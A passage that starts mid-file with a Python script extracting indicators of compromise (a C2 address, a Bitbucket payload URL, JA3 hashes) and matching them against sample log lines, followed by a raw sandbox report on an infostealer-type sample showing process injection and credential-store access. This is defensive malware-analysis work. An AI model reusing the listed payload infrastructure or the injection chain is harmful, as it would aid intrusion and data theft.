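HTTP_RE = re.compile(r"HTTP traffic detected: GET (\S+) HTTP/1\.[01].*?Host: (\S+)")
MEM_URL_RE = re.compile(r"String found in binary or memory: (https?://\S+)")
IP_URL_RE = re.compile(r"^https?://(\d{1,3}(?:\.\d{1,3}){3}):(\d+)/")


@dataclass
class IocSet:
    hashes: set = field(default_factory=set)
    sockets: set = field(default_factory=set)   # (ip, port) pairs of the suspected C2
    urls: set = field(default_factory=set)
    ja3: set = field(default_factory=set)


def normalize_url(url: str) -> str:
    # Memory strings carry trailing junk (the second C2 line ends in ':');
    # strip common trailing punctuation so one URL is not counted twice.
    return url.rstrip(":;,)\"'")


def extract_iocs(text: str) -> IocSet:
    iocs = IocSet()
    for line in text.splitlines():
        if m := HASH_RE.match(line):
            iocs.hashes.add(m.group(1))
        elif m := SNORT_RE.search(line):
            iocs.sockets.add((m.group(1), int(m.group(2))))
        elif m := JA3_RE.search(line):
            iocs.ja3.add(m.group(1))
        elif m := HTTP_RE.search(line):
            # The scheme is not on this line; the report's own memory string
            # for bitbucket.org shows https, which is assumed here.
            iocs.urls.add(f"https://{m.group(2)}{m.group(1)}")
        elif m := MEM_URL_RE.search(line):
            url = normalize_url(m.group(1))
            iocs.urls.add(url)
            if s := IP_URL_RE.match(url):       # a URL on a bare ip:port is also a socket IOC
                iocs.sockets.add((s.group(1), int(s.group(2))))
    return iocs


# Constructed log lines, tab separated: ts, src_ip, dst_ip, dst_port, ja3, http_host, uri
LOG_LINES = [
    "1716200001\t10.0.0.5\t94.156.67.91\t6939\t37f463bf4616ecd445d4a1937da06e19\t-\t-",
    "1716200002\t10.0.0.5\t104.192.141.1\t443\t-\tbitbucket.org\t/exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAAAAAVCC",
    "1716200003\t10.0.0.7\t142.250.74.78\t443\tcaec7ddf6889590d999d7ca1b76373b6\twww.google.com\t/",
    "1716200004\t10.0.0.9\t1.1.1.1\t443\t-\tcloudflare-dns.com\t/dns-query",
]


def match_log(iocs: IocSet, lines) -> list:
    """One hit per matching log line.  A JA3 hash on its own is only low
    confidence: the report tags both fingerprints as 'seen in connection with
    other malware', i.e. shared by many TLS clients, not unique to this sample."""
    hits = []
    for idx, line in enumerate(lines):
        _ts, _src, dst, dport, ja3, host, uri = line.split("\t")
        reasons = []
        if (dst, int(dport)) in iocs.sockets:
            reasons.append(("high", f"c2 socket {dst}:{dport}"))
        if host != "-" and f"https://{host}{uri}" in iocs.urls:
            reasons.append(("high", f"payload url {host}{uri}"))
        if ja3 in iocs.ja3:
            reasons.append(("low", f"ja3 {ja3}"))
        if reasons:
            confidence = "high" if any(c == "high" for c, _ in reasons) else "low"
            hits.append({"line": idx, "confidence": confidence,
                         "reasons": [r for _, r in reasons]})
    return hits


if __name__ == "__main__":
    found = extract_iocs(REPORT_LINES)
    for hit in match_log(found, LOG_LINES):
        print(hit)
```

The file hashes are collected for endpoint hash searches and are deliberately not used in the log matcher. The bitbucket.org entry is a payload-staging path on a legitimate host, so it should be matched and blocked by full URL rather than by domain; the C2 socket and its URL are the high-confidence indicators, while a JA3 hit only justifies a closer look.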
Source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_d5bbd631-1
Source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_3f489398-6
Source: Yara match File source: 5.3.dialer.exe.4bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.dialer.exe.4bb0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.dialer.exe.4bb0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.dialer.exe.4dd0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.dialer.exe.4bb0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dialer.exe PID: 8032, type: MEMORYSTR
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_000001F0D55130C7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor, 15_3_000001F0D55130C7
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E575A540 NtAcceptConnectPort, 15_3_00007DF4E575A540
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E575A600 NtAcceptConnectPort, 15_3_00007DF4E575A600
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E575B154 NtAcceptConnectPort,NtAcceptConnectPort, 15_3_00007DF4E575B154
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E575B088 NtAcceptConnectPort,NtAcceptConnectPort, 15_3_00007DF4E575B088
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E575A2B0 NtAcceptConnectPort, 15_3_00007DF4E575A2B0
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57592CC NtAcceptConnectPort,DuplicateHandle,NtAcceptConnectPort,??3@YAXPEAX@Z,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort, 15_3_00007DF4E57592CC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758C90 NtAcceptConnectPort, 15_3_00007DF4E5758C90
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5759CA0 _calloc_dbg,NtAcceptConnectPort, 15_3_00007DF4E5759CA0
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758C08 NtAcceptConnectPort, 15_3_00007DF4E5758C08
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5759F40 NtAcceptConnectPort, 15_3_00007DF4E5759F40
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758D74 NtAcceptConnectPort, 15_3_00007DF4E5758D74
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758D94 NtAcceptConnectPort, 15_3_00007DF4E5758D94
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5759AF4 _malloc_dbg,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z, 15_3_00007DF4E5759AF4
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758AFC NtAcceptConnectPort, 15_3_00007DF4E5758AFC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758A40 NtAcceptConnectPort, 15_3_00007DF4E5758A40
Source: C:\Windows\System32\OpenWith.exe Code function: 15_2_000001F0D53B1A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 15_2_000001F0D53B1A90
Source: C:\Windows\System32\OpenWith.exe Code function: 15_2_000001F0D53B0AC8 NtAcceptConnectPort,NtAcceptConnectPort, 15_2_000001F0D53B0AC8
Source: C:\Windows\System32\OpenWith.exe Code function: 15_2_000001F0D53B15AC NtAcceptConnectPort, 15_2_000001F0D53B15AC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_2_000001F0D53B1CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification, 15_2_000001F0D53B1CD0
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_3_00007DF445C31CE8 _calloc_dbg,CreateProcessW,NtResumeThread,FindCloseChangeNotification,??3@YAXPEAX@Z, 16_3_00007DF445C31CE8
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_3_00007DF445C31958 _calloc_dbg,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory, 16_3_00007DF445C31958
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343292508 NtAcceptConnectPort, 16_2_0000020343292508
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432923F4 NtAcceptConnectPort, 16_2_00000203432923F4
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343292C40 NtAcceptConnectPort, 16_2_0000020343292C40
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432929B0 NtAcceptConnectPort, 16_2_00000203432929B0
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432928C4 NtAcceptConnectPort, 16_2_00000203432928C4
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034329296C NtAcceptConnectPort, 16_2_000002034329296C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343292894 NtAcceptConnectPort, 16_2_0000020343292894
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343292868 NtAcceptConnectPort, 16_2_0000020343292868
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343292794 NtAcceptConnectPort, 16_2_0000020343292794
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00007DF445C52704 NtQuerySystemInformation,_malloc_dbg,NtQuerySystemInformation, 16_2_00007DF445C52704
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5A385C NtQuerySystemInformation, 17_2_000001D3CF5A385C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 516
Source: nF54KOU30R.exe, 00000000.00000002.1982649519.0000000003B60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTCPZ.exe, vs nF54KOU30R.exe
Source: nF54KOU30R.exe, 00000000.00000002.1982577509.00000000039C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTCPZ.exe, vs nF54KOU30R.exe
Source: nF54KOU30R.exe, 00000000.00000003.1979370491.0000000003DCB000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTCPZ.exe, vs nF54KOU30R.exe
Source: nF54KOU30R.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 15.3.OpenWith.exe.1f0d742aad0.20.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.27.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.6.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.11.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.5.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.10.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.19.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.24.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.1.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.14.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/0@1/2
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034328262C CreateToolhelp32Snapshot,Thread32First,Thread32Next,FindCloseChangeNotification,SuspendThread, 16_2_000002034328262C
Source: C:\Windows\SysWOW64\dialer.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\a63dd526-0b01-49db-ba4f-0abb4644ea93
Source: nF54KOU30R.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\nF54KOU30R.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 0000000F.00000003.2075945157.000001F0D7651000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2076104361.000001F0D7651000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2076270773.000001F0D7610000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: nF54KOU30R.exe ReversingLabs: Detection: 57%
Source: nF54KOU30R.exe Virustotal: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\nF54KOU30R.exe "C:\Users\user\Desktop\nF54KOU30R.exe"
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 552
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1864
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
Source: C:\Program Files\Windows Media Player\wmplayer.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: certmgr.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook Jump to behavior
Source: nF54KOU30R.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: nF54KOU30R.exe Static file information: File size 5007872 > 1048576
Source: nF54KOU30R.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x489800
Source: nF54KOU30R.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: nF54KOU30R.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2. source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb$I` source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: dialer.exe, 00000005.00000003.1934515258.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934457085.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: dialer.exe, 00000005.00000003.1933919289.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1933537331.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: dialer.exe, 00000005.00000003.1934155632.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934298926.0000000004D50000.00000004.00000001.00020000.00000000.sdmp
